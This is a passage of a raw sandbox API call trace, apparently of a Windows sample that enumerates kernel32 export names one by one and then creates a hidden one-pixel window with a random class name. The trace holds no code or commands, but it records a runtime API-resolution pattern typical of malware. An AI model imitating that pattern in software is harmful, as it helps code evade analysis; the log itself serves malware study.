11 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0048.261] lstrlenA (lpString="DELETEFILEA") returned 11 [0048.261] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0048.262] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0048.262] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0048.262] lstrlenA (lpString="DELETEFILEW") returned 11 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0048.262] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0048.262] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0048.262] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0048.262] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0048.262] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0048.262] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0048.262] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0048.262] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0048.262] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0048.262] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0048.262] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0048.262] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0048.262] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0048.262] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0048.262] lstrcpyA (in: lpString1=0x355eba0, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0048.263] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0048.263] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0048.263] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0048.263] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0048.263] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0048.263] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0048.263] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0048.263] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0048.263] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0048.263] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0048.263] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0048.263] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0048.264] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0048.264] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0048.264] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0048.264] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0048.264] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0048.264] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0048.264] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0048.264] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0048.264] lstrcpyA (in: lpString1=0x355eba0, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0048.265] lstrcpyW (in: lpString1=0xca0000, lpString2="qwertyuiopasdfghjklzxcvbnm1234567890 " | out: lpString1="qwertyuiopasdfghjklzxcvbnm1234567890 ") returned="qwertyuiopasdfghjklzxcvbnm1234567890 " [0048.265] RegisterClassExW (param_1=0x355f824) returned 0xc140 [0048.266] CreateWindowExW (dwExStyle=0x0, lpClassName="4k 7 5g ao", lpWindowName="4k 7 5g ao", dwStyle=0x0, X=-2147483648, Y=-2147483648, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0x70000, lpParam=0x0) returned 0x701c8 [0049.257] VirtualFree (lpAddress=0xb90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.258] VirtualFree (lpAddress=0xca0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.258] VirtualFree (lpAddress=0xb40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0049.258] GetMessageA (lpMsg=0x355f860, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0) [0092.936] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x150000 [0092.936] GetTickCount () returned 0x114f5e4 [0092.937] lstrlenA (lpString="kernel32.dll") returned 12 [0092.937] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0092.937] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0092.937] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0092.937] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0092.937] lstrlenA (lpString="ADDATOMA") returned 8 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0092.937] lstrlenA (lpString="ADDATOMW") returned 8 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0092.937] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0092.937] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0092.937] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0092.937] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0092.937] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0092.937] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0092.937] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0092.937] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0092.937] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0092.938] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0092.938] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0092.938] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0092.938] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0092.938] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0092.938] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0092.938] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0092.938] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0092.938] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0092.938] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0092.938] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0092.938] lstrlenA (lpString="BACKUPREAD") returned 10 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0092.938] lstrlenA (lpString="BACKUPSEEK") returned 10 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0092.938] lstrlenA (lpString="BACKUPWRITE") returned 11 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0092.938] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0092.938] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0092.938] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0092.938] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0092.939] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0092.939] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0092.939] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0092.939] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0092.939] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0092.939] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0092.939] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0092.939] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0092.939] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0092.939] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0092.939] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0092.939] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0092.939] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0092.939] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0092.939] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0092.939] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0092.939] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0092.940] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0092.940] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0092.940] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0092.940] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0092.940] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0092.940] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0092.940] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0092.940] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0092.940] lstrlenA (lpString="BEEP") returned 4 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0092.940] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0092.940] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0092.940] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0092.940] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0092.940] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0092.940] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0092.940] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0092.940] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0092.940] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0092.941] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0092.941] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0092.941] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0092.941] lstrlenA (lpString="CANCELIO") returned 8 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0092.941] lstrlenA (lpString="CANCELIOEX") returned 10 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0092.941] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0092.941] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0092.941] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0092.941] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0092.941] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0092.941] lstrlenA (lpString="CHECKELEVATION") returned 14 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0092.941] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0092.941] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0092.941] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0092.941] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0092.941] lstrcpyA (in: lpString1=0x355e7c0, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0092.941] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0092.942] lstrcpyA (in: lpString1=0x355e7c0, lpString2="ClearCommBreak" | out: 